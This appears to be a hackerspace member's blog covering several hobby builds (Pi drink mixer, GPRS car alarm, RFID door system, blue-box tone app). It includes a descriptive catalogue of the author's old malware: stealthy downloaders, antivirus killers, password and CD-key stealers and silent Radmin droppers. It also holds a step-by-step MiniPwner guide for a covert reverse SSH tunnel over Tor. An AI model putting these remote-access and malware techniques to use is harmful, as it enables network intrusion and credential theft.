Pi Bar

Using parts made from a Makerbot Replicator 2X 3D printer, some square metal rods, and a series of 5 peristaltic pumps. The project was based off a project called Bar Mixvah. The problem with the orginal is that you had to use a sluggish MongoDB database and a laptop in order to get it up and running. I wanted something that was self contained. Using an old Raspberry Pi with 256mb ram, I worked with a few guys from NESIT to redesign the top portion to fit the raspberry pi into and then created a slim MySQL backend with PHP and node.js.

20140623_22564620140625_221346

Below is the Pi hat to connect the pumps to the Pi
20140825_22035820140825_232749
20140825_23275820140825_232821
20140825_232843

Old Code

This is just a post to preserve some old backdoor programs i wrote 10+ years ago that I used to mischievously learn programming and windows API. I no longer have the source for anymore. If I can dig them up I’ll post with the binaries.


Acid Reign 1.0
Coded in ASM 9/2001
First program I wrote was a webdownloader , the client was in Visual Basic and the server was in ASM
Acidreign
version 2.0 coded in ASM 5/9/2002
Acidreign2.0


trILLian rape ver. 1.0
Coded in ASM 4/27/2002
a 2.45kb trillian pws thats sends user names and passwords to your icq number.
Trillianrape1.0


ILL-Eagle 1.0
Coded in ASM 5/20/2002
a 1.62kb webdownloader that will download any Visual Basic file from a website and execute it. works on win9x/me/nt/2k/xp
*checks to see if Msvbvm60.dll is in the system directory ,if not it dlls it
*once downloaded runs the file hidden
*melts itself after file is downloaded removing any traces of itself
Ill_eagle1.0


mini-web vers. 1.0
Coded in ASM 6/2/2002
a 1kb webdownloader that will download any file from a website and execute it.works on win9x/me/nt/2k
Miniweb1.0


kILLer webdlr vers. 1.0
Coded in ASM 6/12/2002
a 3.1kb webdownloader that will download any file from a website and execute it.also kills any AV’s and firewalls running works on win9x/me/nt/2k/xp
Webdownloader_killer1.0


Shut-it Downloader vers. 1.0
Coded in ASM 6/17/2002
a 3.5kb webdownloader that will download any file from a website and execute it.also kills any AV’s and firewalls running works on win9x/me/nt/2k/xp
Webdownloader_shut-it1.0


half life jacker ver. 1.0
Coded in ASM 10/19/2002
a 1.35kb app thats sends half life cd-key to your icq number.
Halflifejacker1.0


WebcamNow Jacker
Coded in ASM 6/2003
Snags the saved password from the registry and sends it to an ICQ number
Webcamnow


CMDGet 1.0
Coded in ASM 8/2003
Downloads a file from a website from user provided parameters from the commandline/dos prompt/shell
Directions:
type: CMDGet


CMDGet 1.0
Coded in ASM 9/2003
a 1.26kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. basically it downloads the radmin server and dll from the web and adds the proper registry keys for it to function.
Ghost_radmin1.0


NCWrapper 1.0
Coded in ASM 1/30/04
Automatically expands Netcat to the windows directory and executes user-choosen parameters *self-deletes after expanding/running commands (netcat is left running)
Ncwrapper1.0


mini-web vers. 2.0
Coded in ASM 2/10/04
a 1.5 kb webdownloader. Compressed with FSG it is only 977bytes. works on win9x/me/nt/2k
Miniweb2.0


Ghost Radmin 2.1
Coded in ASM 6/15/2004
a 1.24kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. basically it downloads the radmin server and dll from the web and adds the proper registry keys for it to function. (default port is 4899 and pass is LetMeIn )
Ghost_radmin2.1


Ghost Radmin Generator 1.0
Coded in ASM 10/6/04
Generates a dropper that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp.Extracts the radmin server and dll from itself and adds the proper registry keys for it to function.(default pass is 12345678). Self-deletes after installing Radmin.
Ghost_radmin1.0gen


To Catch a Thief

Due to my car getting broken into 2 times in the past few weeks, I decided to use the opportunity to make a project out of it. One of our members had bought a Seeed Studio GPRS Arduino shield last year for a project but it was sitting around collecting dust so I asked him if i could borrow it.

The device uses an unlocked SIM card to send out sms text messages. (Can also be used for voice and data too). I worked with a few guys at NESIT to figure out the best plan to trigger the device. Our option was to connect the interior light to pin2 on the Arduino so that when the light turned on the 12volts would trigger the shield to send the SMS. Also added a 10kΩ resistor inline to drop the voltage down to so it wasn’t feeding a full 12v back into the Arduino. To power the device i was originally going to go with a 9v battery but since my cars cigarette lighter stays on when the car is off I decided to use this to power the device so I didnt have to worry about the 9v battery dying.

So hacking up an old phone charge wire I then used a perf board to solder together a 0.1uF capacitor and a LM7805 voltage regulator to drop the voltage from 12v to 5v to feed into the Arduino. Also added a 5.1k. resistor to ground. This is the design that member Cobey had drawn up for the connections.

The SIM card that he had no longer worked since it was over a year so I stopped by Walmart and bought an AT&T gophone SIM card for $10 and a recharge/refill card for $15. It was as simple as calling the number provided on the package and putting in the refill card pin info, and giving the GPRS shield’s IMEI printed on the SIM900 chip.

So after a few tests I finally got it working, so all’s i need to do is hook it up to my lighter, then hook pin2 up to my interior light underneath the dash

When my original $15 is up AT&T said I can convert my gophone plan over to text only for $5/month, so its pretty cheap.

If you would like to build a similar device the cheapest ive seen for an arduino clone is $13.50 ::HERE::

And for the GPRS Shield was $30 ::HERE::

Find yourself a nice case for them (I ended up using a weatherproof AT&T DSL box) and you’ll be off and running for about $70 total including the SIM card and first month.

The Arduino source code is available ::HERE:: you just need to change the phone number to your own number and upload it to your Arduino.

Thanks to Cobey,Devin, and Gary for helping out with the project, one of the great things about a hackerspace is you have people to turn to when you have questions. I’ll be updating soon with results if my device is triggered :)

MiniPwner – Evil Network Dropbox


The MiniPwner is a penetration testing “drop box”, it is a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the pwnie express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the minipwner include:

Atheros 400MHz MIPS CPU
32MB RAM
4MB flash
10/100Mbps Ethernet interface
802.11b/g/n wireless interface with one internal antenna
USB 2.0 port
Micro-USB power socket, approximately 1W power draw
5.7cm x 5.7cm x 1.8cm dimensions
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
karma Wireless Sniffing Tool
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client

So after doing the initial install of open-wrt firmware and configurations for the other applications I came across an awesome article on SecurityGeneration.com which described some james bond type shit of having your pwnie express connect back to you over tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address you would be connecting back to a tor *.onion address. But since I dont have a pwnplug the only problem that lied ahead was to convert the instructions to work on this minipwner box. Now im not an expert on getting this shit configured properly so i relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting minipwner onto the tp-link here, so i’ll pick up where his article left off. And im not going to rehash getting your tor hidden server running, follow step 1. on SecurityGeneration’s article if you need to figure it out.

First thing I did was get tor installed on the USB drive (which should already be setup with the original instructions on the minipwner site)

opkg -dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root
next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib then save the config file. This changes the logging to the USB drive, otherwise tor will start and start writing to the minipwners flash memory and soon it’ll be full. You should be able to start tor with no errors by typing tor. as long as it work you might wanna have tor start when the minipwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default open-wrt doesn’t have anything to compile programs in their repository, so it’s a clusterfuck because you need to do to cross-compile connect.c for the minipwners MIPS architecture on another box using the toolchain shit , then send it over to you minipwner and pray that it works. Luckily I already went though this and have binary ::here::. I’ll write more about doing this at a later time. So, all’s you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get open-ssh on the minipwner:

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 line to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate it to connect back to your hidden tor server
just change the blablablabla.onion to your .onion address and the ssh_user to your username

vi reversessh.sh

#!/bin/sh
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key=”/root/.ssh/id_rsa”
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i “$SSH_key” “$SSH_user”@”$Remote_Tor” -p “$Rec_Port”;

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your tor hidden server you can just run watch “netstat -lntup” you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

you should be connected to your minipwner over tor 🙂

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.

RFPiD – Raspberry Pi Access Control

We’ve been working on our new door entry system for NESIT that will allow members to enter the space through our sliding door. This will replace our current Arduino RFID door access system. It utilizes a RFID card reader that checks the tag against a SQLite database then opens the door by triggering a 5v relay connected to a garage door opener. It also tweets when someone arrives @ the space to Twitter.com as well as logging the arrival into the database. Connected to the front of the device is a small 4.5 lcd screen connected by s-video port that plays videos when someone scans their card.

The door can also be controlled over GoogleTalk with multiple google accounts. An authorized user can open and close the door, add or remove users from the database, query the database accounts, check the current temperature, callerID lookups, geoIP lookups, play sounds/videos, and send messages to it’s twitter account. All this can be done right from your cell phone or laptop.

The door also has a PIR sensor that will sense when someone’s walking by and asks them to press the pushbutton on the front if they want to learn more about NESIT. When they press it, it’ll play a short promo video about us.

nesitpi

A sample of the base RFPiD python code is available here: Github

The idea:
This project came out of necessity. With the amount of members we have, it made more sense to make an automated door access system, than to give everyone keys. We originally used an Arduino for the last 2 years, but we wanted to be able to control the database of users easier, our current setup wrote the users to the eeprom of the Arduino. We were thinking about using an ethernet module to talk with a server on our network but if our network had issues that would prevent someone from entering. The small footprint of the Pi makes it a better choice than to run a server fulltime. Our modest server burns through around $200 a year worth of electricity. By comparison a Raspberry Pi consumes about $3 per year. With the Raspberry Pi we could now have ethernet capabilities, could store its own database, gpio pins , video output and more.

Starting the project I needed to figure out how to interface a RFID reader with the Pi. I wanted to interface it with the UART pins but due to time constraints I ended up using a sparkfun USB adapter with my Innovations ID-20 RFID reader. The only thing I has to do was monitor the USB in /dev and receive the RFID tag ID when someone scanned their card. To do this I used python script that monitored serial connection on /dev/ttyUSB0 the base of the script which I have posted to my github account and used a sqlite3 database to verify if the card scanned was a valid member, if so it would trigger the door. Also used a RGB LED to notify if the card was good or not.

With the RFID stuff working it was time to pick out a good enclosure. We had a few old outdoor phone boxes laying around the space, these are the same ones you would commonly see being used for phone service hookup outside of your house. These were perfect because the plastic is thick and sturdy and you are able to lock the case. The first thing we had to do was gut the inside, which consisted of removing the electronics and dremeling the plastic to fit everything inside the box.

phoneboxphonebox2

Since the Pi supported S-video out, I found a cheap 4.5” LCD screen on Amazon that was from a car backup camera system that had S-video inputs. I cut out the front of the box and fit the screen into place. So now when someone entered it would play a video corresponding to that user.
phonebox3phonebox4

I also started modding a python script for GoogleTalk from mitchtech.net that allowed me to control the Pi from my Android phone by sending it commands. I also added code to it to allow multiple bot admins, allow me to add/remove/modify users in the RFID card database, check the current temperature, callerID lookups and geolocate IP addresses. Also added Twitter capabilities , so when someone entered the space , the Pi would tweet who entered and what time. Which served as sort of a backup to our entry log, and let other members know who was currently at the space.

nesitpi

Originally I was going to use a 12v door actuator with our normal door, which you will see if some of the videos, but we also had a sliding door that one of our members decided to hook up to a garage door opener to. So now all I had to do was interface the garage door trigger with a 5v relay. I also added a arcade button so members can open the door from inside the space.
garagedoorarcadebutton

I added a tamper button inside that would send out an email alert if someone tried to open the case, it also curls an image from the IP camera we have outside the door. Another button in front that would play a promo video when someone pressed it. The final thing I installed was a PIR sensor, It would wait for movement , such as someone walking by, and beckon them to press the button to play a randomly picked NESIT promo video.

The power for the device was a power supply for an external hard drive. The great thing about it is that it outputs 5v and 12v natively so I didn’t have to muck around with stepping the voltages up or down. You can get one on eBay etc for about $7. This helped because the LCD screen runs on 12v and the other components run off 5v. I installed a mounting block inside to help run all the wires to each device.

RFPiD-inside3RFPiD-frontRFPiD-front2RFPiD-insideRFPiD-inside2

All the python code and C code runs from bootup and/or cron jobs that check to see if the files are running and restart them if needed to keep the device running perfectly.

In total the project was around $160
$40 for PI
$50 for RFID and USB breakout board
$20 for LCD
$30 for used garage door opener
$3 for PIR sensor
$10 for wiring,4gb SD card, LEDs, and resistors
$4 for Temp sensor


To be continued….

SlapBoxing

slapboxing
A small program in MASM that simulates the old phone blue box (MF tones) & DTMF tones. It essentially plays the tones from .mp3 files that have been modified to act like .wav files so the file size is small. They are then embedded in the application as a resource. You just press the button to hear the tone. Download it ::HERE::